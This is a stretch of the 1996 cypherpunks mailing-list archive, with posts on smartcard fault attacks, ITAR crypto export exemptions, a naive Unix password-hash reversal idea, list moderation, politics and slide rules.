Date: Fri, 1 Nov 1996 19:48:20 -0800 (PST)
To: Frank Willoughby <frankw@in.net>
Subject: Re: Computer Security Risk Assessment Software?
In-Reply-To: <9611010101.AA15878@su1.in.net>
Message-ID: <327AA793.4A4B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Frank Willoughby wrote:
> Methinks "Ross Wright" <rwright@adnetsol.com> wrote:
> >On or About 31 Oct 96 at 12:19, Dr.Dimitri Vulis KOTM wrote:
> >> which I assume is NOT what you have in mind :-) Do you mean
> >> something that'll take a survey of a company's computer security

> >Boom.  Nail, head, one shot!!!!  What's on the market now in that area?

> >> and assess the risk (like Stan) or something more global?

> >The issues are:
> >Information Risk Assessment and Management and also Information Security Assessment.

> >> AFAIK, there's no tool on the market to help in all aspects of risk management
> >> even for a small outfit, because there are so many sources of risk. There
> >> are many good specialized packages.

> I beg to disagree. Tools, like checklists, are ok as far as a memory jogger goes (to
> make sure that you haven't overlooked something) but there is no way they can replace
> an assessment or audit by a seasoned Information Security Officer or professional.
> ISOs have eyes, ears, fingers, and a mind. Tools don't.

[snip]

> The solutions to the above-mentioned problems are:
> Shop around.  Find out which consultants are qualified and what they charge.
> Make sure the consultant caps his cost.  You should know the maximum price tag
> associated with the consulting engagement BEFORE the consultant walks in the front
> door.  This helps to avoid having the consultant camp on your doorstep at $XXX
> dollars per hour for days, weeks, or months on end.

The above is a nice ideal.  You should of course get a "really good" consultant,
and even better, get one who's "real honest".  But my guess is those guys cost the
most of all, or at the very least, require the most research to find.

The ideal of capping the cost is commendable as well, however, when the consultant
finds midway through the project that his initial estimate (made as carefully as he
possibly can) is way too low, he will now have an incentive to lie, cut corners, etc.,
*particularly* if the customer looks like one of those antsy types who might withhold
payments and so on.

My advice:  Get a consultant to find a good IT consultant.  Seriously.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 1 Nov 1996 19:48:38 -0800 (PST)
To: Hard Media <zaid@hardnet.co.uk>
Subject: Re: tcmay in favour of redistribution of wealth?
In-Reply-To: <v01520d01ae9e641109f4@[158.152.61.59]>
Message-ID: <327AAAF6.4E8C@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Hard Media wrote:
> Date: Mon, 28 Oct 1996 10:15:35 -0800 tcmay wrote:
> > While I won't get started again here, understand that my views are much
> > more than just "justifiable apathy" about the people of the world.

[snip]

> Where Walter Wriston/Third World debt is concerned the events are not
> natural, we'r not talking about a flood, which is a "natural" event but the
> actions of a man, or if you prefer an organisation. There is nothing "natural"
> about these. A country in debt to the IMF/World Bank or Citibank must accept
> "Stabilisation Policies" :

[snip]

Just a short comment: The smart guys will refinance any third-world debt (or similar
debt) as many times as they have to, as long as they can keep the interest payments
coming in.  This is how you get ahead in "new money".

When Reagan and his financiers descended on China in 1985, they commenced a deal that
would make the rapid development of Nazi Germany (a Reagan favorite as well) look like
kid stuff.

Some (not all) economic theories are quite simple, like the physics of flowing water or
falling objects, thus:

In the U.S., for example, you have the world's most highly disciplined and aggressive
consumers, and in China, for example, you are seeing what is becoming the world's
most prolific producers.  Like air flowing into a vacuum, the goods will flow from
the producer to the consumer, and the guys who make money on the interest (primarily)
will do *anything* to maintain that flow.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 1 Nov 1996 18:42:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: New Bihman-Shamir Fault Analysis Paper
In-Reply-To: <v03007804ae9e6eb1b360@[204.246.66.47]>
Message-ID: <v03007801aea06461b8d2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:18 PM -0800 11/1/96, Martin Minow wrote:
>There is an inherent conflict between two claims that are
>central to the fault-analysis paper(s):
>   "the secret key [is] stored in a tamperproof cryptographic device"
>and
>   "the cryptographic key is stored in an asymmetric type of
>    memory, in which induced faults ..."
>
>If the device is truly tamperproof, the attacker should not
>be able to induce faults.  Even given susceptable "consumer-

OK, so the authors might have better used the phrase "putatively
tamperproof." Or the more accepted modern phrase, "tamper-resistant."

As with safes, castles, and "bulletproof vests," all claims of absolute
security are dubious.

What the Bellcore and Biham-Shamir (and other, reportedly) attacks have
done is to show another vector by which "tamperproof" is not.

>quality" devices, it would be trivial to store the cryptographic keys
>in a redundant memory configuration, such as ECC "error-correcting
>code" memory that can self-correct a range of failures and detect
>a much wider range. It would also seem reasonable to protect the
>cryptographic core (algorithms and data) with a digital signature
>that would "crash" the device, rather than proceed with incorrect
>key information.

Faults can be induced as well in logic devices. I agree that redundancy can
be added to logic devices (I worked on this for Intel a while back), but
this would require an almost complete re-doing of smartcard processors.
(For starters, imagine implementing triple redundancy in smartcards....not
cheap.)

Again, what these recent attacks show is a theoretical avenue by which
nominally tamper-resistant cards may have their defenses breached. Whether
this is an important threat depends on a bunch of factors. Whether
cardmakers change their chips also depends on a bunch of factors.

--Tim May


P.S. A while back there were a bunch of posts with the title "Professor
Shamir Arrested." Was it ever established whether or not the arrested
Shamir was in fact _our_ Adi Shamir? And what the charges were?






"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Fri, 1 Nov 1996 16:53:04 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Cranky Listserver?
In-Reply-To: <327A1159.131@gte.net>
Message-ID: <199611020204.UAA14042@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <327A1159.131@gte.net>, on 11/01/96 at 07:03 AM,
   Dale Thorn <dthorn@gte.net> said:

>Anonymous wrote:
>> Is anyone else having trouble getting their posts picked up on the list?
>> Messages I send to: cypherpunks@toad.com sometimes have to reposted as
>> many as three times before I see them in my incoming list traffic.

>Try waiting longer, even a day or two, before reposting.

>It really saves on the duplicate traffic!!

>The interconnectedness of the various internet servers, plus the usual anomalies of
>electronics and real-world software, mean you can't predict when a particular
>posting will "come through".

I'v noticed a 6hr delay for my messages to get posted. Or atleast that's how long it
takes before I get a copy back here.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 1 Nov 1996 19:48:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 'what cypherpunks is about' [RANT]
In-Reply-To: <199610260031.BAA13872@typhoon.dial.pipex.net>
Message-ID: <327AC3A7.653D@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 1:30 AM -0600 11/1/96, snow wrote:
> >Mr. Hassen wrote:
> >> But remember people are NOT sheep and nothing lasts forever.

> > Yes, they are, and death does.

> >Loans to third world counties are made (obstensively) to help industry and farming
> >to be developed, and to improve the conditions of the people. It rarely works that
> >way, and I think it is a wasted effort, but it is better than nothing.

> We mine the copper they have no money to mine and pay them with worthless trinkets
> like penicillin, schools, and roads.  We are exploiting them. Yep, they are better
> off in a state of natural grace, eating grubs and with a life expectancy of 35.

Since this is such a perfect example of making unfair judgements about other people's
lives (you do agree that their lives are their own, I hope), I'll add a comment:

There is nothing wrong with having a life expectancy of 35, if you grow up in a society
where the normal lifespan is 35.  To say that it's "bad", and that we "simply must"
dispense our technology upon "them" is bogus.  Sure, most techno-freaks would leap at
the chance to expand their own lifespans to, say, 200+ years (with good health), and
acquire nifty advanced techno devices as well should some unforseen advanced race or
species dispense that stuff on us.

But think about that for a minute.  You can't assume that the visitors are going to
let you just have all of that, and all you have to do is work hard and suck up to them
and you'll be rewarded, etc.

"Those people" in "those countries" are where they are not because they don't have
money and technology per se, it's because of what's in their minds.  I'll support a
neighborly approach when that's what we're talking about, but you and me aren't going
over "there" with the Boy Scouts to lend them a hand, now, are we?  No, we're going
to collect taxes and send the Government instead.

Everybody fantasizes about something for nothing, even when the fantasy is U.S. giving
"those people" something they "really need".  Fooey.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 1 Nov 1996 17:31:00 -0800 (PST)
To: nobody@replay.com (Anonymous)
Subject: [noise] Re: Montgolfiering, the Hot Air Balloon of Cryptography
In-Reply-To: <199610292117.WAA10630@basement.replay.com>
Message-ID: <199611020146.TAA00470@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Fie on the small minds that cackle at my brilliance! As a Mensa member and
> founder of the Society for Superintelligent Former NSA Employees, I chortle
> at the baseness of callow criticisms by those doubters and dilletantous
> denigrators of virtual one-time pads and PRNGs (perfect random number
> generators).
> 
> Montgolfiering. What is it, you ask? It is demonstrably a new paradigm in
> the evolution of homo sapiens (Parry Messger excepted) toward Shannon's
> dream of a one-time pad needing only a single, easily memorizable number as
> a seed. I have heard only silence when I challenged the so-called
> superbrains of this latargial list to try to determine which number I am
> using as the seed of my system. If you are such great smarty pants, far

     Put the dictionary down, and back away slowly...


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 1 Nov 1996 18:09:32 -0800 (PST)
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Sliderules, Logs, and Prodigies
In-Reply-To: <199611012123.NAA07411@netcom6.netcom.com>
Message-ID: <199611020206.UAA00247@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Bill Frantz wrote:
> 
> Slide rules are still, IMHO, the best calculator to keep in a car for
> calculating gas mileage.  They are rugged, have no batteries, are not
> attractive to thieves, and have sufficient accuracy for the problem.  They
> also teach the logarithm relation, which is valuable for understanding the
> physical universe.
> 

Gas mileage is easy enough to calculate without any devices.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 1 Nov 1996 20:33:20 -0800 (PST)
To: Martin Minow <minow@apple.com>
Subject: ITAR financial crypto exception?
Message-ID: <3.0b28.32.19961101202112.006d4308@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:42 PM 10/30/96 -0800, Martin Minow wrote:

>At the Bernstein case oral arguments last September, I distinctly
>remember the government lawyer stating that the United States does
>not restrict "financial cryptography." Perhaps he should have
>qualified his argument somewhat.
>
>This statement bothered me, as I cannot understand how an encryption
>algorithm can "know" that it is encrypting a financial transaction,
>rather than some non-financial document that would be export-restricted.

According to the "United States Munitions List", 22 CFR 121.1, Category
XIII, "Auxiliary Military Equipment":

"Information Security Systems and equipment, cryptographic devices,
software, and components specifically designed or modified therefor" are
included in the munitions list; but not if they are 

"[s]pecially designed, developed or modified for use in machines for
banking or money transactions, and restricted to use only in such
transactions. Machines for banking or money transactions include automatic
teller machines, self-service statement printers, point of sale terminals
or equipment for the encryption of interbanking transactions." (22 CFR
121.1, Category XIII (b)(1)(ii)),

or if they are 

"[l]imited to access control, such as automatic teller machines,
self-service statement printers or point of sale terminals, which protects
password or personal identification numbers (PIN) or similar data to prevent
unauthorized access to facilities but does not allow for encryption of
files or
text, except as directly related to the password of PIN protection." (22
CFR 121.1, Category XIII (b)(1)(v)).

As I read this, people exporting ATM's and other commercial financial
equipment don't need to fuss over the ITARs; and probably not people
selling Bank-O-Matic software; the question is not whether or not the
software involved could be used for financial applications, or if it can
tell that it is (and turn on or off strong crypto), but whether or not the
system in question was "specially designed, developed, or modified" for
financial applications (or access control), and limited (by some means) to
only those uses; and this is a question that humans can (and must) answer
at the time of export.

(Also, I don't think that *documents* are ever export controlled; just the
applications/systems that read and write them. Nobody tell the State Dept
about John von Neumann and the interchangeability of code and data, ok? :)  

I understood Mr. Coppolino's remarks to be referring to the above; but if
his statement was as broad as you remember, he perhaps went a bit too far.
(Or maybe he was thinking of something else.) I don't remember the context
of his comments. Does anyone know if a transcript of the hearing is
available? It's my understanding that many court reporters are now making
transcriptions available on disk, facilitating easy transition to the Web.  

As always, my comments are provided not as legal advice (or even as an
authoritative understanding/interpretation of the ITARs/AECA) but as a
contribution towards a general discussion. I still don't have an especially
current source for the text of the ITARs at home; the above is from the
EFF's copy of the 1993 changes. Someday I'll remember to pop across the bay
and pick up a copy at the US Gov bookstore, but it hasn't happened yet.
(Looks like the paperback 22 CFR volume is around $30, from info I found on
the Web, if anyone else is interested. It'd make a good thing to set hot
things on when they come off of the stove. :) 


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 1 Nov 1996 18:27:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WWII & Japan (fwd)
Message-ID: <199611020228.UAA04357@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> > Again they knew something was up, just not where.
> 
> You may well be right, but there are seemingly serious
> historians who claim otherwise. Since you have studied 
> the subject for 30 years I would be interested in your
> comments on the book 'Infamy' by John Toland (1982).

I like Toland a lot. I do not accept what he says without reservation.

> I remember being very taken by his arguments when I
> read it. He has extensively studied the protocols from
> the post war hearings and military court proceedings
> dealing with the subject (and they were plentiful)
> interviewed many of the involved persons years after.

The war trials for the Japanese were compromised by a variety of political
intrigues. Ranging from political issues regarding the best way to govern
the war torn country (ie can't kill too many of them or the Japanese will
simply pick up weapons again with an estimated 1,000,000 US dead as a
result) to the biological weapons that were developed which were quite
useful for the Allies sans the Soviets. 

> According to Toland:
> 
> The US president, selected members of his cabinette and a
> few admirals and generals knew - from Magic and the 'winds'
> execute, radio traffic analysis, diplomatic sources, double
> agents - exactly when and where the Japaneese were going to
> attack, but didn't warn Hawaii, fearing that too efficient
> counter-measures by the Oahu military might make the attack
> abort and so not convince the isolationists. The unexpected 
> tactical capabilities of the Japaneese armada then made a
> cover-up all the more important.

Hawaii appears in *NO* MAGIC transmissions of that time period. If you,
Toland, or anyone else can give specifig MAGIC intercepts I would be greatly
appreciative. The MAGIC intercepts did mention Borneo, The Ka Peninsula, and
the Phillipines (where the B-17's were headed that were destroyed at Pearl).

The radio traffic analysis, ship movement analysis, etc. did not point to a
specific target (how could they considering the breath of the Japanese
opening attacks all over the Pacific) only that the Japanese were serious.

The isolationists were never convinced (eg Lindbergh) that war was the right
thing to do.

There was nothing unexpected about the tactics. There were two previous test
of shallow water torpedo attacks, both successful. The first was by the British
and the second was by the US at Pearl (how is that for irony?) which was
attended by Japanese observers. The heads of state and military did not
seriously believe Hawaii was a realistic target and therefore looked
elsewhere.

Sun Tzu says the first target in war is your opponents mind, the Japanese
took it to heart.

                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 1 Nov 1996 11:29:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Development of an Open and Flexible Payment System
Message-ID: <199611011929.UAA20581@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Information on our payment system is now available:

	Development of an Open and Flexible Payment System

	Abstract: The Internet is in need of a simple, open, flexible
	and secure payment system. Many payment systems that currently
	exist are either proprietary, insecure, inflexible or all three.
	This paper examines the types of payment system in use today, the
	payment system requirements of Systemics Ltd., an overview of the
	Systemics Open Transaction (SOX(tm)) payments system that was
	developed, and a summary of how this system met the requirements.

	The SOX payment system is currently in live use for a bond trading
	system, and a reference implementation will shortly be made
	available on the Internet.

	http://www.systemics.com/docs/sox/overview.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Troy M. Barnhart" <barney@rapidnet.com>
Date: Fri, 1 Nov 1996 20:16:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 'what cypherpunks is about'
Message-ID: <2.2.32.19961102041624.006bbad8@rapidnet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 11/01/96 +0000, Hard Media wrote:

>Go and read a few books, 
>try  "Bury My Heart at Wounded Knee" - J Dee  
>and then try "Blackfoot Physics" by F David Peat.

my $.02 worth...

Have live in the Western Dakota's all my life...
I, currently, live about an hour away from Wounded Knee...

Don't let the "Hollywood" effect on the American Indian
overwhelm you....

They had some fascinating cultural facts, etc....

Are they Oppressed? Maybe more than 50 years ago...
Now... most have done it to themselves...

think on it...

barney



     "Was mich nicht umbringt, macht mich starker." - (Nietzche)
     "Wit is educated insolence." -  (Aristotle)
      E-mail:  barney@rapidnet.com       "Troy M. Barnhart"
     Web:  http://www.rapidnet.com/~barney/     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 2 Nov 1996 00:28:24 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Sliderules, Logs, and Prodigies
Message-ID: <1.5.4.32.19961102082625.003b226c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:30 AM 11/1/96 -0800, you wrote:
>Seriously, only a very few of us had and used sliderules...mine was a big
>synthetic K & E (Keuffel and Esser, as I recall). The raging "DOS vs. Mac"
>or "RISC vs. CISC" debate of that age was "aluminum" (the yellow Dietzgens)
>vs. the old standby, "bamboo." Plus some oddball circular sliderules.

I used plastic ones, myself; they were good enough for any work
I was doing, even after the occasional rebuild when the [whatever you
call the clear slider with the line on it] fell off.
Started with the basic model, and later a wider log-log-trig model.
I also had a few circular ones, including a big car-rally model
that let you get an extra digit or so of precision (remember when
precision was measured in digits rather than bits? :-)

There were also a variety of nomographs and other weird slide-rules
and graphical tools that were simple analog computers.  We used some
of them in electrical engineering classes for complex calculations
that didn't need to be highly precise, which most of them didn't
in a world where the extra-fancy resistors had 5% tolerances
and you achieved accuracy by adding various tweakers instead.

ObCrypto: Secret Decoder Rings are more or less circular slide rules,
but there really isn't much crypto you can do in analog.  :-)


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 2 Nov 1996 02:13:32 -0800 (PST)
To: cypherpunks, gnu
Subject: Dr. Vulis is not on cypherpunks any more
Message-ID: <199611021013.CAA17861@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


As stated by Dr. Vulis, he is no longer on the cypherpunks mailing
list, and indeed majordomo@toad.com HAS been instructed to ignore his
requests to resubscribe.

I removed him, on my own initiative.  I got tired of asking him to
stop stirring up flames.  When he posted a message saying that we'd
have to use technical means to stop him from flaming the list, I said,
"OK".

Tim May was not involved.

I've met Dr. Vulis in person.  He seemed like a reasonable guy.  I
treated him that way for months, despite his inability to control
himself on the list.  When he ultimately declined to control his
outbursts after numerous personal requests, I removed him.

The cypherpunks list is for discussions centered around cryptography.
I'm sure there are several mailing lists where ethnic cleansing
discussions would be welcome.  There are probably even mailing lists
which encourage people to fire off their best inflammatory messages.
If there aren't, Dr Vulis could start one.  I don't sponsor any.

Cypherpunks, please resist your own temptation to bait him (or anyone
else).  The best defense a mailing list has against flames is to
simply ignore them.  When they don't provoke an emotional response,
they don't accomplish the poster's goal, and the poster eventually
wanders off in search of more naive pastures.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 1 Nov 1996 23:36:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 'what cypherpunks is about' [RANT]
In-Reply-To: <327AC3A7.653D@gte.net>
Message-ID: <199611020734.CAA28486@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dale Thorn wrote:
> 
> "Those people" in "those countries" are where they are not because 
> they don't have money and technology per se, it's because of what's in 
> their minds.  I'll support a neighborly approach when that's what 
> we're talking about, but you and me aren't going over "there" with the
> Boy Scouts to lend them a hand, now, are we?

Some of us do.

But anyway... what was cypherpunks about again? I've had more focused 
discussions about crypto on alt.politics.white-power. Seriously.

- -rich
 boy scout/esperanza
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMnr5dioZzwIn1bdtAQHsKwGAhOKOUZJ6OBbwjYMZkTDPmNaLu0d3mY8n
4QkjPCWdP4NV3VTf7G/7fEkPk//ICKl7
=dWh2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 1 Nov 1996 23:37:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Iridium satellite xceivers idea?
Message-ID: <199611020735.CAA28507@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Several months ago, someone was raving about getting Linux PCs and 
cheap satellite comms into Hong Kong in preparation for the mainland 
takeover so that the ensuing human rights violations could be 
documented. If there's anyone left on cypherpunks who knows or cares 
about that kind of thing, let me know.

- -rich
 group 19
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMnr5qyoZzwIn1bdtAQHtWgF+J46Kz4kUiAdbZ8JWbiRPp5VSAfi4qAqk
ZfMXNPh4ma/eUMBnxrDmfgKJuhdUGXcq
=hUZX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erp <erp@digiforest.com>
Date: Sat, 2 Nov 1996 01:59:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Unix User Password File Encryption
Message-ID: <Pine.LNX.3.95.961102024749.14461A-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain




Ok, I realize that you cannot reverse the encryption process for a Unix
password..  But --  Explain to me why the following wouldn't work.  And if
it could work, I am willing to do the algorithms and math for this...  I'm
no good at coding and such..  But I can do algorithms and a lot of math
easily enough *shrug*....  And if anybody uses this idea ---  Please give
me credit for the idea..  If it has already been tried --  Can someone
please refer me to where it was tried, adn if there are any texts on it..
I would like to read them..  Thanks ok here it is:

Normal Programs for Cracking a Unix password file, such as CrackerJack
take a word, use the salt in the password file for that password, encrypt
the word using that salt, and then compare what it comes out as.  If it
isn't the same, it moves on to the next word.   My idea is similar to
this, but is a bit different.

Basically it would take a beginning word and encrypt it with the same salt
as used on the password in the passwd file.  So let us say that for an
example our salt is aa, our outcome encrypted password is X8mfjs53D ...
Ok now let us say that we take this salt of aa and run through the
following into it and getting these patterns from it (these aren't the
true patterns etc, I'm just making htese things up, but would it be
possible?)  

salt aa  --  inputed password  0001  --  outcome encryption  Zkdrj234S
salt aa  --  inputed password  0002  --  outcome encryption  Rksjr342s
salt aa  --  inputed password  0003  --  outcome encryption  25Svj43zY

(For the following process we'd obviously use mor ethan three, we would
probalby use a thousand at least, nad have them be all sizes of passwords
and combiantions..  like aaaab or abababababab and so on...)

Compare the outcomed encryptions --  And find a pattern in them..  Now in
the above I'm just going to say like it comes out as 
8x + 4/y - SQ(2z) + 4a = encrypted password..  Where xyza are each of the
characters respectively such as   0000 
                                  xyza  based on a 255 or however many
ascii char system..  I know this is completely wrong for what I've done
here, but I'm not doing the math or anything right now, I'm just making it
up as I go for an example...  Now say that since we have found the
pattern...  We take the outcome --  Do the algebra to figure out what the
xyza would be..  And ther eya go woopity doo there is the password..
Not as simple as I've said here of course..  It would be a lot more
complex..  But that is the basic idea...   What is wrong with this idea?
--  If it is something I have thought of, and havent' mentioned --  I'll
inform you when you point it out..  But please do point it out..  Or I'll
grasp at straws and say a lot of buts *laugh*...

Anyways,  What is wrong with this idea?  How could it work?
Would someone mind explaining for me, is much appreciated...

Erp


---------------------------
E'gads, ideas can be hell at time..










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 2 Nov 1996 06:59:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank you, John Gilmore, for protecting freedom of speech against Dr. Dmitri Vulius
Message-ID: <199611021445.GAA00213@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thank you, John, for being so brave and protecting our freedom of
on-topic speech. You are a true cypherpunk.

Thank you, Timothy C May, for advancing cryptography by posting 100%
crypto-relevant messages about loans to other countries and your
collection of assault weapons.

John and Timothy just made the cypherpunks list better.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 2 Nov 1996 10:00:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: anonymous oddsman
Message-ID: <199611021758.JAA04138@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ladbroke's (celebrating Halloween, probably) again offers
50:1 odds on Perot! Clinton and Browne are still not being
offered. Recalling last Saturday's Dole odds; they were
7:1 at Ladbroke's, and 8:1 at William Hill. The betters at
Ladbroke's (who get a somewhat worse deal, it seems) are
bullish on Dole, while those at William Hill are now a bit
more bearish on the old man, so the numbers diverge in the
final stretch of the horserace.

              Prices @ 09:21 GMT Sat 2nd Nov 96
        +---------+----------------+----------------+
        |         |  Ladbroke's    | William Hill   |
        +---------+----------------+----------------+
        | Clinton | Not currently offered by either |
        | Dole    |     6:1        |     10:1       |
        | Perot   | 50:1 (again)   |    500:1 (!)   |
        | Browne  | Not currently offered by either |
        +---------+----------------+----------------+
        | Phone   | +44-800-524524 | +44-800-444040 |
        | Numbers:|                |                |
        +---------+----------------+----------------+

As for the animal suspected of *really* running the U.S.A,
"Socks" appears to be successfully defending his territory
against "Leader." Full of confidence, she is now running
virtual tours of the White House, kids!

http://www.whitehouse.gov/WH/kids/html/home.html

Meanwhile "Leader" whimpers at

http://www.firstdog.com/

(Wow, his own domain!) Perot (obviously) needs no pet, and
the oddsman is unaware of any public photos of Libertarian
candidate Browne's cats, much less their names. A serious
campaign.

Our roving reporter in the UK also thinks that there *must*
be significance in the fact that our Presidential election
is being held on the anniversary of the day that Guy Fawkes
attempted to blow up his Houses of Parliament, together
with all the politicians within. He, as usual, will celebrate
the event with bonfires and fireworks.

Mailmasher.com appears to be down, apologies to any of you
who wished to correspond personally with the oddsman there.
Hopefully, oddsman@mailmasher.com will come back soon.
anonymous oddsman

"Demeaning the integrity of the U.S. Presidential election process
for you on a regular basis, at no charge."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 2 Nov 1996 10:06:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: ITAR financial crypto exception?
Message-ID: <199611021806.KAA05269@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:25 PM 11/1/96 -0800, Greg Broiles quoted:
>According to the "United States Munitions List", 22 CFR 121.1, Category
>XIII, "Auxiliary Military Equipment":
>
>"Information Security Systems and equipment, cryptographic devices,
>software, and components specifically designed or modified therefor" are
>included in the munitions list; but not if they are 
>
>"[s]pecially designed, developed or modified for use in machines for
>banking or money transactions, and restricted to use only in such
>transactions. Machines for banking or money transactions include automatic
>teller machines, self-service statement printers, point of sale terminals
>or equipment for the encryption of interbanking transactions." (22 CFR
>121.1, Category XIII (b)(1)(ii)),
>
>or if they are 
>
>"[l]imited to access control, such as automatic teller machines,
>self-service statement printers or point of sale terminals, which protects
>password or personal identification numbers (PIN) or similar data to prevent
>unauthorized access to facilities but does not allow for encryption of
>files or
>text, except as directly related to the password of PIN protection." (22
>CFR 121.1, Category XIII (b)(1)(v)).

I don't think either of these exclusions would cover the reference
implementation of the SET protocol.  I don't think it would cover an
electronic commerce application running on a personal computer/workstation
either.  Therefore I conclude that the ITAR is contributing to the
vulnerability of our emerging electronic commerce infrastructure.


-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Niels Provos <provos@wserver.physnet.uni-hamburg.de>
Date: Sat, 2 Nov 1996 01:32:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: http relay script
Message-ID: <Pine.A32.3.94.961102102726.27509C-100000@wserver.physnet.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

I am sure this was discussed already.
